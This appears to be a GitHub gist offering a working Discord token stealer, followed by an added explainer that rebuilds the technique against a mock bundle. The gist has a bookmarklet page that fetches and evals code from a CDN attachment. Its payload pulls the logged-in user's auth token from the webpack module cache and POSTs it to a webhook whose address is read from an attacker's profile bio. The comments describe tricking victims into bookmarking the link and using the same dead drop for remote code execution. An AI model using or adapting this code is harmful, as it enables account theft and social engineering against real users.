@oSumAtrIX
Last active December 25, 2022 01:09
Payloadable Discord info stealer
<!--
- Author: oSumAtrIX
- Website: https://osumatrix.me
- Date: 2022-04-29
- License: GPL-3.0
- Description:
- Example page responsible for delivering the payload. Because Discord's Content-Security-Policy restricts the origins the page may fetch from, the payload cannot be pulled from an attacker host; it has to be served from a Discord-controlled origin, here the attachment CDN.
- Upload `payload.txt.js` as a text attachment in a Discord message and put the attachment URL in the href below so that the bookmarklet fetches and evals it.
- The victim is instructed to bookmark the href. Because it is a `javascript:` URL, opening the bookmark runs the script in the context of whatever page is open, which must be Discord for the payload to do anything (the payload checks the hostname). Note that `.then(eval)` is an indirect call to eval, so the fetched code runs in global scope rather than inside the promise callback.
-->
<html lang="en">
  <body>
    <a
      href="javascript:fetch('https://cdn.discordapp.com/attachments/SERVER_ID/CHANNEL_ID/payload.txt').then(result => result.text()).then(eval)"
    >
      CTRL+SHIFT+B & drag to favourites bar
    </a>
  </body>
</html>

/**
 * Author: oSumAtrIX
 * Website: https://osumatrix.me
 * Date: 2022-04-29
 * License: GPL-3.0
 * Description:
 * This is a PoC payload that grabs the authorization token of the logged-in user and sends it to a webhook.
 * The webhook address is not hard-coded: the attacker stores it in the bio of a Discord account they control,
 * and the payload reads it at runtime through the profile API, so the exfiltration address can be rotated
 * without re-uploading the payload.
 * The same dead-drop technique can be used to execute further code remotely: the bio can point at another
 * attachment whose contents the payload fetches and evals.
 */
(() => {
  // Do not proceed if the payload is being executed outside the Discord domain.
  if (location.hostname != "discord.com") return;

  // Get webpack objects. Pushing a chunk with a never-installed id onto the
  // chunk-loading global makes webpack invoke the third element with its own
  // require function, whose `.c` property is the module cache. The result is
  // memoised on window because webpack only runs the runtime function for a
  // chunk id it has not installed yet, so a second identical push is a no-op.
  if (!window.webpackInstance) {
    window.webpackInstance = {};
    webpackChunkdiscord_app.push([
      [[""]],
      {},
      (query) => {
        window.webpackInstance.cache = query.c;
      },
    ]);
  }

  // Optionally get some user information...
  // const user = Object.values(window.webpackInstance.cache)
  //   .find((config) => {
  //     return (
  //       config.exports &&
  //       config.exports.default &&
  //       config.exports.default.getCurrentUser
  //     );
  //   })
  //   .exports.default.getCurrentUser();

  // Get the token by walking the module cache for the module whose default
  // export carries a getToken method. If the bundle has changed shape, find()
  // returns undefined, the next property access throws and the payload stops.
  let token = Object.values(window.webpackInstance.cache)
    .find((config) => {
      return (
        config.exports &&
        config.exports.default &&
        config.exports.default.getToken
      );
    })
    .exports.default.getToken();

  // The id of an attacker-controlled Discord user, used as a key to get the
  // webhook address. 0 is a placeholder.
  let address_delivery = 0;
  fetch("https://discord.com/api/v9/users/" + address_delivery + "/profile", {
    headers: {
      authorization: token,
    },
  })
    .then((r) => r.json())
    .then((j) => {
      // The user's bio contains the delivery address: the id/token path of a Discord webhook.
      const webhook_address = j.user.bio;
      const webhook_url = "https://discord.com/api/webhooks/" + webhook_address;
      // Send payload
      fetch(webhook_url, {
        headers: { "content-type": "application/json" },
        body: JSON.stringify({ content: token }),
        method: "POST",
      });
    });

  // alert("PoC successful!");
})();
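The webpack trick the payload relies on (pushing a bogus chunk onto `webpackChunkdiscord_app` so that webpack calls the chunk's runtime function with its own require and thereby hands over the module cache) is easier to follow against a toy bundle. The block below is an added example, not part of the gist and not Discord's real bundle: it models the part of webpack 5's chunk loader that matters here (`webpackJsonpCallback`, the installed-chunk check and the `require.c` cache), then applies the same cache-walking search the payload uses. Module ids, module contents and the token string are constructed, and `buildFakeBundle`, `grabModuleCache`, `findDefaultExport` and `grabToken` are names chosen for this example.

```javascript
// Added example (not from the gist): a miniature model of a webpack 5 bundle's
// chunk loader, enough to show why `webpackChunkdiscord_app.push([...])` leaks
// the module cache and why the chunk id must be one the bundle has never seen.
function buildFakeBundle() {
  // Constructed modules imitating the export shape the payload searches for.
  const moduleFactories = {
    101: (module) => { module.exports = { default: { getToken: () => "FAKE.tokenvalue.signature" } }; },
    102: (module) => { module.exports = { default: { getCurrentUser: () => ({ id: "0", username: "victim" }) } }; },
    103: (module) => { module.exports = { default: {} }; },
  };
  const moduleCache = {};
  function __webpack_require__(id) {
    const cached = moduleCache[id];
    if (cached !== undefined) return cached.exports;
    const module = (moduleCache[id] = { id, loaded: false, exports: {} });
    moduleFactories[id](module, module.exports, __webpack_require__);
    module.loaded = true;
    return module.exports;
  }
  __webpack_require__.m = moduleFactories;
  __webpack_require__.c = moduleCache; // the property the payload reads as `query.c`

  const installedChunks = { main: 0 };
  const chunkLoadingGlobal = []; // stands in for window.webpackChunkdiscord_app
  // webpack 5's webpackJsonpCallback, trimmed to the branches relevant here.
  function webpackJsonpCallback(parentPush, data) {
    const [chunkIds, moreModules, runtime] = data;
    // The runtime function only runs for a chunk id that is not installed yet:
    // that is why the payload pushes an unused id, and why it memoises the
    // result instead of pushing the same chunk twice.
    if (chunkIds.some((id) => installedChunks[id] !== 0)) {
      for (const moduleId in moreModules) moduleFactories[moduleId] = moreModules[moduleId];
      if (runtime) runtime(__webpack_require__);
    }
    if (parentPush) parentPush(data);
    for (const id of chunkIds) installedChunks[id] = 0;
  }
  chunkLoadingGlobal.push = webpackJsonpCallback.bind(null, chunkLoadingGlobal.push.bind(chunkLoadingGlobal));

  // Simulate the app booting: the entry point requires its modules, filling the cache.
  Object.keys(moduleFactories).forEach((id) => __webpack_require__(id));
  return chunkLoadingGlobal;
}

// The payload's technique: push a fake chunk whose runtime callback captures
// the bundle's require function and returns its module cache.
function grabModuleCache(chunkLoadingGlobal, chunkId = "") {
  let cache;
  chunkLoadingGlobal.push([[chunkId], {}, (req) => { cache = req.c; }]);
  return cache; // undefined when the chunk id was already installed
}

// Walk the cache for a module whose default export has the wanted method.
// Unlike the gist, a miss returns undefined instead of throwing.
function findDefaultExport(cache, methodName) {
  const hit = Object.values(cache).find(
    (m) => m.exports && m.exports.default && typeof m.exports.default[methodName] === "function"
  );
  return hit ? hit.exports.default : undefined;
}

// End to end: the same steps the payload performs, against the toy bundle.
function grabToken(chunkLoadingGlobal) {
  const cache = grabModuleCache(chunkLoadingGlobal, "token-probe");
  if (!cache) return undefined;
  const tokenModule = findDefaultExport(cache, "getToken");
  return tokenModule ? tokenModule.getToken() : undefined;
}
```

Running `grabToken(buildFakeBundle())` returns the constructed token string. Pushing a second chunk with an id that was already used returns `undefined`, which is the behaviour the gist's `if (!window.webpackInstance)` guard works around.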